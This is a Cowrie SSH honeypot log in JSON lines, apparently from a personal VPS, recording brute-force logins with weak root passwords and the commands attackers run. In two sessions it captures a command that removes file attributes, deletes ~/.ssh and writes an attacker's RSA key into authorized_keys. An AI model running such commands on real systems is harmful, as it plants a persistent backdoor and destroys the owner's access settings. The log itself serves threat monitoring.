{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:24:03.035508Z","src_ip":"45.88.8.215","session":"a33b8ad4ff6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:24:03.036786Z","src_ip":"45.88.8.215","session":"a33b8ad4ff6d"}
{"eventid":"cowrie.login.success","username":"root","password":"Mitul@123","message":"login attempt [root/Mitul@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:24:05.231721Z","src_ip":"45.88.8.215","session":"a33b8ad4ff6d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:05.770549Z","src_ip":"45.88.8.215","session":"a33b8ad4ff6d"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":48280,"dst_ip":"1.2.3.4","dst_port":22,"session":"984e3fb1d49c","protocol":"ssh","message":"New connection: 167.99.49.89:48280 (1.2.3.4:22) [session: 984e3fb1d49c]","sensor":"my-vps","timestamp":"2025-08-26T13:24:09.371944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:24:09.372861Z","src_ip":"167.99.49.89","session":"984e3fb1d49c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:24:09.461908Z","src_ip":"167.99.49.89","session":"984e3fb1d49c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6116,"dst_ip":"1.2.3.4","dst_port":22,"session":"41841c16228f","protocol":"ssh","message":"New connection: 212.227.235.229:6116 (1.2.3.4:22) [session: 41841c16228f]","sensor":"my-vps","timestamp":"2025-08-26T13:24:09.604046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T13:24:09.690301Z","src_ip":"212.227.235.229","session":"41841c16228f"}
{"eventid":"cowrie.login.failed","username":"mk","password":"mk123","message":"login attempt [mk/mk123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:24:09.857089Z","src_ip":"167.99.49.89","session":"984e3fb1d49c"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T13:24:09.933530Z","src_ip":"212.227.235.229","session":"41841c16228f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:10.947844Z","src_ip":"167.99.49.89","session":"984e3fb1d49c"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T13:24:12.568199Z","src_ip":"212.227.235.229","session":"41841c16228f"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:12.569778Z","src_ip":"212.227.235.229","session":"41841c16228f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33846,"dst_ip":"1.2.3.4","dst_port":22,"session":"081a85f7ca9b","protocol":"ssh","message":"New connection: 212.227.235.229:33846 (1.2.3.4:22) [session: 081a85f7ca9b]","sensor":"my-vps","timestamp":"2025-08-26T13:24:29.898158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:24:29.899132Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:24:30.139844Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.login.success","username":"root","password":"+","message":"login attempt [root/+] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:24:31.145308Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:24:31.700158Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:24:31.700833Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:24:31.701620Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34832,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d150d930708","protocol":"ssh","message":"New connection: 212.227.235.229:34832 (1.2.3.4:22) [session: 7d150d930708]","sensor":"my-vps","timestamp":"2025-08-26T13:24:31.864583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:24:31.865525Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:31.943477Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:24:32.117330Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:24:32.442886Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:24:32.443632Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:24:32.687526Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:32.688540Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35830,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae989d01cbb1","protocol":"ssh","message":"New connection: 212.227.235.229:35830 (1.2.3.4:22) [session: ae989d01cbb1]","sensor":"my-vps","timestamp":"2025-08-26T13:24:32.932043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:24:32.933129Z","src_ip":"212.227.235.229","session":"ae989d01cbb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:24:33.175353Z","src_ip":"212.227.235.229","session":"ae989d01cbb1"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass2024","message":"login attempt [root/Pass2024] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:24:33.909615Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:24:34.188603Z","src_ip":"212.227.235.229","session":"ae989d01cbb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:24:34.481599Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:24:34.482296Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:24:34.483199Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:34.736396Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:24:35.325042Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.325853Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.433099Z","src_ip":"212.227.235.229","session":"ae989d01cbb1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.579998Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.581040Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37534,"dst_ip":"1.2.3.4","dst_port":22,"session":"18b098a3c7fc","protocol":"ssh","message":"New connection: 212.227.235.229:37534 (1.2.3.4:22) [session: 18b098a3c7fc]","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.675176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.676200Z","src_ip":"212.227.235.229","session":"18b098a3c7fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42124,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a1b4340aaae","protocol":"ssh","message":"New connection: 212.227.235.229:42124 (1.2.3.4:22) [session: 4a1b4340aaae]","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.834074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.835112Z","src_ip":"212.227.235.229","session":"4a1b4340aaae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes1